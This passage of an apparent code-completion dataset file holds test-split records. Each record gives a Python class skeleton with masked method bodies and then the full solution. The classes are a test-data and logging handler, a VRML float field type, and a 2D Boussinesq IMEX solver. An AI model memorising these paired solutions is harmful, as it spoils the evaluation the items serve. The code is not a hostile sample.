os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000407", "length_bytes": 875, "license_type": "no_license", "methods": [{"docstring": "读取data.xlsx的结果", "name": "get_test_data", "signature": "def get_test_data(self, sheet)"}, {"docstring": "log初始化", "name": "log_init", "signature": "def log_init(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006347", "prompt": "Implement the Python class `MiddleHandler` described below.\n\nClass description:\nImplement the MiddleHandler class.\n\nMethod signatures and docstrings:\n- def get_test_data(self, sheet): 读取data.xlsx的结果\n- def log_init(self): log初始化", "prompted_full_text": "Implement the Python class `MiddleHandler` described below.\n\nClass description:\nImplement the MiddleHandler class.\n\nMethod signatures and docstrings:\n- def get_test_data(self, sheet): 读取data.xlsx的结果\n- def log_init(self): log初始化\n\n<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "revision_id": "abd4671b88b650a3b21d63ea50ffd5f64578826f", 
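The `Segmentor` record above shows a common pattern: interleave Conv and BatchNorm layers in a ModuleList, apply He (Kaiming) initialization to every conv/linear weight via `self.apply`, then override the final 1x1 classifier conv with Xavier init and finish with a channel-wise softmax. A minimal runnable sketch of that pattern follows; it is an illustration under assumptions, since `add_conv_block`, `self.Conv`, `self.BatchNorm`, and `base_filters` come from a GANDLF parent class not shown in the record, so plain `nn.Conv2d`/`nn.BatchNorm2d` stand in for them.

import torch
import torch.nn as nn
import torch.nn.functional as F

class TinySegmentor(nn.Module):
    def __init__(self, anatomy_factors=8, filters=16, n_classes=4):
        super().__init__()
        # Two conv+BN pairs, mirroring the layer_list built in __init__ above.
        self.layers = nn.ModuleList([
            nn.Conv2d(anatomy_factors, filters, 3, padding=1),
            nn.BatchNorm2d(filters),
            nn.Conv2d(filters, filters, 3, padding=1),
            nn.BatchNorm2d(filters),
        ])
        self.conv = nn.Conv2d(filters, n_classes, 1)
        self.apply(self.weight_init)                    # He init everywhere first
        nn.init.xavier_normal_(self.conv.weight.data)   # then override the head
        self.conv.bias.data.zero_()

    @staticmethod
    def weight_init(module):
        # Same logic as Segmentor.weight_init: Kaiming-normal weights and
        # zeroed biases for every Conv2d/Linear submodule.
        if isinstance(module, (nn.Conv2d, nn.Linear)):
            nn.init.kaiming_normal_(module.weight)
            if module.bias is not None:
                module.bias.data.zero_()

    def forward(self, x):
        # Even indices are convs applied raw; odd indices are BatchNorms
        # followed by LeakyReLU(0.2), matching the i % 2 split in the record.
        for i, f in enumerate(self.layers):
            x = f(x) if i % 2 == 0 else F.leaky_relu(f(x), 0.2)
        return F.softmax(self.conv(x), dim=1)

out = TinySegmentor()(torch.randn(2, 8, 32, 32))        # shape: (2, 4, 32, 32)

He initialization is the natural match for the LeakyReLU activations used in the hidden layers, while the softmax head gets Xavier, a choice the original __init__ makes explicitly.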
"skeleton": "<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MiddleHandler:\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n", "source": "the_stack_v2_python_sparse", "source_path": "middle_handler/middlehandler.py", "source_repo": "wyuuu1210/autotest", "split": "test", "star_events_count": 0} {"blob_id": "76f32816b81a2645b48c5f143d13198f86ec11e7", "bodies": ["try:\n return float(value)\nexcept ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))", "if isinstance(value, float):\n return 1\nreturn 0"], "bodies_text": "<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "class_docstring": "SFFloat field/event type base-class", "class_name": "_SFFloat", "detected_licenses": ["GPL-1.0-or-later", "MIT", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-other-copyleft", "LGPL-2.1-or-later", "GPL-3.0-only", "LGPL-2.0-or-later", "GPL-3.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000408", "length_bytes": 34853, "license_type": "permissive", "methods": [{"docstring": "Coerce the given value to our type Allowable types: any object with true/false protocol", "name": "coerce", "signature": "def coerce(self, value)"}, {"docstring": "Check that value is of precisely the expected data type", "name": "check", "signature": "def check(self, value)"}], "n_methods": 2, "prompt": "Implement the Python class `_SFFloat` described below.\n\nClass description:\nSFFloat field/event type base-class\n\nMethod signatures and docstrings:\n- def coerce(self, value): Coerce the given value to our type Allowable types: any object with true/false protocol\n- def check(self, value): Check that value is of precisely the expected data type", "prompted_full_text": "Implement the Python class `_SFFloat` described below.\n\nClass description:\nSFFloat field/event type base-class\n\nMethod signatures and 
docstrings:\n- def coerce(self, value): Coerce the given value to our type Allowable types: any object with true/false protocol\n- def check(self, value): Check that value is of precisely the expected data type\n\n<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "revision_id": "7f600ad153270feff12aa7aa86d7ed0a49ebc71c", "skeleton": "<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n if isinstance(value, float):\n return 1\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/vrml/fieldtypes.py", "source_repo": "alexus37/AugmentedRealityChess", "split": "test", "star_events_count": 1} {"blob_id": "9ee0902d4162d266c48aa9a88e6e3326b20c0c65", "bodies": ["essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\nfor key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\nsuper(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\nself.N = [self.params.nvars[1], self.params.nvars[2]]\nself.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\nself.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\nself.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\nself.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\nself.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\nself.gmres_logger = logging()", "b = rhs.flatten()\ncb = Callback()\nsol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, 
restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\nif factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\nme = self.dtype_u(self.init)\nme[:] = unflatten(sol, 4, self.N[0], self.N[1])\nreturn me", "fexpl = self.dtype_u(self.init)\ntemp = u.flatten()\ntemp = self.D_upwind.dot(temp)\nfexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\nreturn fexpl", "temp = u.flatten()\ntemp = self.M.dot(temp)\nfimpl = self.dtype_u(self.init)\nfimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\nreturn fimpl", "f = self.dtype_f(self.init)\nf.impl = self.__eval_fimpl(u, t)\nf.expl = self.__eval_fexpl(u, t)\nreturn f", "dtheta = 0.01\nH = 10.0\na = 5.0\nx_c = -50.0\nme = self.dtype_u(self.init)\nme[0, :, :] = 0.0 * self.xx\nme[1, :, :] = 0.0 * self.xx\nme[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\nme[3, :, :] = 0.0 * self.xx\nreturn me"], "bodies_text": "<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "class_docstring": "Example implementing the 2D Boussinesq equation for different boundary conditions", "class_name": "boussinesq_2d_imex", "detected_licenses": 
["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = 
unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000409", "length_bytes": 6164, "license_type": "permissive", "methods": [{"docstring": "Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)", "name": "__init__", "signature": "def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh)"}, {"docstring": "Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh", "name": "solve_system", "signature": "def solve_system(self, rhs, factor, u0, t)"}, {"docstring": "Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS", "name": "__eval_fexpl", "signature": "def __eval_fexpl(self, u, t)"}, {"docstring": "Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS", "name": "__eval_fimpl", "signature": "def __eval_fimpl(self, u, t)"}, {"docstring": "Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts", "name": "eval_f", "signature": "def eval_f(self, u, t)"}, {"docstring": "Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution", "name": "u_exact", "signature": "def u_exact(self, t)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_006108", "prompt": "Implement the Python class `boussinesq_2d_imex` described below.\n\nClass description:\nExample implementing the 2D Boussinesq equation for different boundary conditions\n\nMethod signatures and docstrings:\n- def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh): Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\n- def solve_system(self, rhs, factor, u0, t): Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. 
for time-dependent BCs) Returns: dtype_u: solution as mesh\n- def __eval_fexpl(self, u, t): Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\n- def __eval_fimpl(self, u, t): Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\n- def eval_f(self, u, t): Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\n- def u_exact(self, t): Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution", "prompted_full_text": "Implement the Python class `boussinesq_2d_imex` described below.\n\nClass description:\nExample implementing the 2D Boussinesq equation for different boundary conditions\n\nMethod signatures and docstrings:\n- def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh): Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\n- def solve_system(self, rhs, factor, u0, t): Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\n- def __eval_fexpl(self, u, t): Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\n- def __eval_fimpl(self, u, t): Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\n- def eval_f(self, u, t): Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\n- def u_exact(self, t): Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\n\n<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. 
for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "revision_id": "de2cd523411276083355389d7e7993106cedf93d", "skeleton": "<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different 
boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, 